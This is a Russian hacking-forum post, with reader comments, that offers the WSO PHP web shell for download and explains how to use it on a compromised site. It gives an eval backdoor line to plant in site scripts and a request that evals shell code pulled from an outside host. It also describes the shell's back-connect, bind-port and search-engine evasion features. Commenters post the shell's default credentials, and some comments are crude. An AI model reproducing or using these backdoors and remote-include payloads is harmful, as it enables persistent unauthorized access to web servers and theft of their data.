prowebber.ru - Тут есть все для настоящих вебмастеров

Чтение RSS Мы в твиттере



WSO - веб шелл


У нас вы можете скачать бесплатно WSO - веб шелл .

Не пропустите комментарии к WSO - веб шелл.
Данный материал предоставлен сайтом ProWebber.ru исключительно в ознакомительных целях. Администрация не несет ответственности за его содержимое.

WSO - веб шелл


Не то чтобы статья, но многим будет полезно. Итак, мы проникли в админку, мы в итоге смогли хоть куда-то впихнуть такой код, примеру:
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

или просто:
assert(stripslashes($_REQUEST[lala]));

stripslashes в данном случае исключительно для обхода magic_quotes=ON
Многие вставляют
system($_GET['cmd'])
и прочие безобразия, но это все лишнее, на самом деле все проще. Итак, вы вставили данный код куда-то (в faq.php, или у вас уже есть просто типо такой бекдор где-то в недрах скриптов сервера).
Т.е. в итоге вы к примеру добились работоспособности вот такого линка:
http://localhost/user.php?e=phpinfo();

И после этого у многих начинающих ступор. Немедленно следующий вопрос - а что же делать дальше?
А давайте повнимательнее взглянем на этот phpinfo, что нам вывело, основные два пункта, что нас будут интересовать в данной ситуации:
allow_url_fopen
allow_url_include


allow_url_include
- да, жесть конечно, но, как правило, off.

Остается
allow_url_fopen
, а он, как правило = ON. Как же мы может использовать данную возможность, безрассудно оставленную админом, чтобы не париться особо (не искать папки, доступные на запись и тому подобную ерунду выяснять да и вообще не заливать шелл как таковой, но лазить по серваку как-будто шелл уже залит). Да очень просто. Если
allow_url_fopen = ON
и у вас есть код, выводящий хотя бы
PHPINFO();
то считайте вы уже прочитали все конфиги, слили все что вам надо и т.д. (не путайте с "порутать", только то, что можно прочитать)

Берем последний шелл от глубокоуважаемого oRb, удаляем первую строчку:
<?php # Web Shell by oRb

+
удаляем последнюю
?>

+
можно удалить пароль, шелл ведь не заливаем, просто юзаем, не оставляя

сохраняем на любой хост как bla_bla.txt (тот же narod.ru вполне подойдет) или в виде картинки на файлообменнике, предоставляющем прямые ссылки на скачку контента и делаем такой запрос:
Код:
http://localhost/user.php?a=eval(file_get_contents('http://site.ru/bla_bla.txt'));

Всё. У вас полноценный шелл без физического его залития на сервак со всеми обычными возможностями шелла. Спасибо за внимание
PS: tested on WSO2.4 (wso2_pack.php)

Описание шелла:
Авторизация
Информация о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Работа со строками + поиск хеша в онлайн базах
Биндпорт и бек-коннект (Perl)
Поиск текста в файлах
*nix/Windows
Из фишек
Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (24.32 KB)
Выбор кодировки, в которой работает шелл.

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Автор статьи: Pashkela
Автор шелла: oRb

Архив содержит последнюю версию шелла и небольшую тулзу WSOmanager - для работы с шеллами.

Скачать шелл:
Внимание! У вас нет прав для просмотра скрытого текста.



 (голосов: 16)
Просмотры: 6242 VIP ProWebber | Комментарии (17)
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

hecz

  • 9 ноября 2010 16:13
  • Регистрация: 24.02.2010
  • ICQ: 791833
  • Комментариев: 95
а какой $auth_pass = "63a9f0ea7bb98050796b649e85481845";

--------------------

Пряник

  • 9 ноября 2010 16:35
  • Регистрация: 26.09.2010
  • ICQ: 1422995
  • Комментариев: 53
Зачетно! Надо испытать как нибудь на досуге...

artur3333

  • 9 ноября 2010 16:40
  • Регистрация: 9.09.2010
  • ICQ: 48888816
  • Комментариев: 93
спс,протестим ! Может кто поможет разобратся с этим всем?

--------------------

DEADok

  • 9 ноября 2010 16:49
  • Регистрация: 8.11.2009
  • ICQ: --
  • Комментариев: 35
паролько какой чтобы этот шел юзать?

f1xed

  • 9 ноября 2010 17:32
  • Регистрация: 18.02.2010
  • ICQ: 626575
  • Комментариев: 79
хорошая очень вещь
для тех, кто в танке: пароль в мд5, если его расшифровать, то получится root
пароль для шелла: root

--------------------

alexcreew

  • 10 ноября 2010 11:51
  • Регистрация: 10.11.2010
  • ICQ: --
  • Комментариев: 10
Да, вещица хорошая

gad

  • 10 ноября 2010 22:52
  • Регистрация: 7.11.2010
  • ICQ: 238184827
  • Комментариев: 1
ой бля я не могу Админ, меня пед*раса фотку Выложыл бля бля yahoo rofl

laid18

  • 11 ноября 2010 00:14
  • Регистрация: 21.10.2010
  • ICQ: --
  • Комментариев: 62
gad,
Ты наверное на провеббер доступа хочеш лешится?!

Dr. Neo

  • 11 ноября 2010 01:41
  • Регистрация: 3.12.2009
  • ICQ: 370771525
  • Комментариев: 275
Хватит бл*ть х*йню писать. Никто сюда уже ничего не зальет нах!

Joey

  • 17 ноября 2010 18:26
  • Регистрация: 5.01.2010
  • ICQ: 963285
  • Комментариев: 270
WSOmanager
а от него какой пароль?

--------------------

WebSupport

  • 17 ноября 2010 19:00
  • Регистрация: 15.11.2010
  • ICQ: --
  • Комментариев: 236
А какой от него толк вообще?

mitrushi

  • 17 ноября 2010 19:16
  • Регистрация: 4.01.2010
  • ICQ: --
  • Комментариев: 148
Цитата: Joey
WSOmanagerа от него какой пароль?

логин: root
пароль: toor
и пароль для самого шелла: root

--------------------

WebSupport

  • 17 ноября 2010 19:19
  • Регистрация: 15.11.2010
  • ICQ: --
  • Комментариев: 236
mitrushi, благодарю

Rednex

  • 8 июня 2011 18:51
  • Регистрация: 8.06.2011
  • ICQ: --
  • Комментариев: 10
спасибо за статью )

mitrushi

  • 10 октября 2011 00:15
  • Регистрация: 4.01.2010
  • ICQ: --
  • Комментариев: 148
Многоуважаемый oRb обновил шелл до версии WSO 2.5.1

--------------------

IceSkip

  • 10 октября 2011 00:32
  • Регистрация: 11.08.2011
  • ICQ: 863118
  • Комментариев: 154
gj.pf. yf ljceut//,kfujlfh. pf byae

прикольно,надо будет попробовать на досуге,благодарю

--------------------

Serj566

  • 26 декабря 2011 13:41
  • Регистрация: 17.12.2011
  • ICQ: --
  • Комментариев: 1
Надо попробовать этот способ!

Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.


Yandex-Апдейт
↓ Апдейты Яndex тИЦ
13.04.2012Последний
16.02.2012
04.02.2012
↓ Апдейты выдачи Яndexa
17.05.2012Последний
15.05.2012
12.05.2012
↓ Апдейты ЯКаталога
16.05.2012Последний
11.05.2012
09.05.2012
Витрина ссылок
Elegant Division: Коллекция смайлов для DLE
Assada: Profile Reviews 1.3 - модуль стены для DLE! http://assada.com.ua/
Misterio: DCOReARTS.COM - Студия web - дизайна и графики!
Misterio: DCOReARTS.COM - Студия web - дизайна и графики!
skRpk: пбчит.рф Баги и Читы для игры Point Blank

Поддержи сайт
Скрипты, cms, шаблоны, статьи по раскрутке

Опросы

Чего не хватает сайту?

Материала
Живого общения

Последние комментарии:

  • Всё для IPB
  • Информер